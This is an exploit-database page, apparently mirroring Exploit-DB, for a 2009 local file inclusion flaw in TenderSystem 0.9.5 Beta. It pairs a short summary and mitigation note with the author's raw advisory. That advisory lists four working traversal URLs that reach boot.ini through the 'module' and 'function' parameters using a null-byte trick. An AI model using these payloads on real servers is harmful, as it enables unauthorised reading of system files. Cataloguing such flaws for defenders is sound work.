header-logo
Suggest Exploit
vendor:
TenderSystem
by:
Packetdeath
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: TenderSystem
Affected Version From: 0.9.5 Beta
Affected Version To: 0.9.5 Beta
Patch Exists: NO
Related CWE: N/A
CPE: a:tendersystem:tendersystem:0.9.5_beta
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

TenderSystem 0.9.5 Beta Local File Inclusion Vulnerability

TenderSystem 0.9.5 Beta is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability to include local files on the server. This can be exploited by sending a specially crafted HTTP request with directory traversal sequences and a null byte (%00) to the vulnerable application. This can be used to read sensitive files from the server.

Mitigation:

The application should filter user input and validate the input for malicious characters. The application should also restrict the user to access only the files that are necessary for the application to function.
Source

Exploit-DB raw data:

  __________                __           __      .___             __  .__     
  \______   \_____    ____ |  | __ _____/  |_  __| _/____ _____ _/  |_|  |__  
   |     ___/\__  \ _/ ___\|  |/ // __ \   __\/ __ |/ __ \\__  \\   __\  |  \ 
   |    |     / __ \\  \___|    <\  ___/|  | / /_/ \  ___/ / __ \|  | |   Y  \
   |____|    (____  /\___  >__|_ \\___  >__| \____ |\___  >____  /__| |___|  /
                  \/     \/     \/    \/          \/    \/     \/          \/ 
				  
-------------------------------------------------------------------------------------------
Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS 
I was unable to get this to work on a Linux server. Further testing may be required.
 ------------------------------------------------------------------------------------------
Target: TenderSystem 
Version: 0.9.5 Beta
Site  http://www.tendersystem.com/
Demo: http://demo.tendersystem.com/
Date: 2-14-2009
-------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.ssteam.ws
Contact: yaii_abc@hotmail.com
-------------------------------------------------------------------------------------------
Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws
------------------------------------------------------------------------------------------- 

Exploit:
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login



http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login



http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html


http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg
-------------------------------------------------------------------------------------------------------
Vuln code in main.php: 

// load required files
require('modules/generic/ts_main.php');
?>
-------------------------------------------------------------------------------------------------------

Some things are better left unsaid <3
... That is all.

/Packetdeath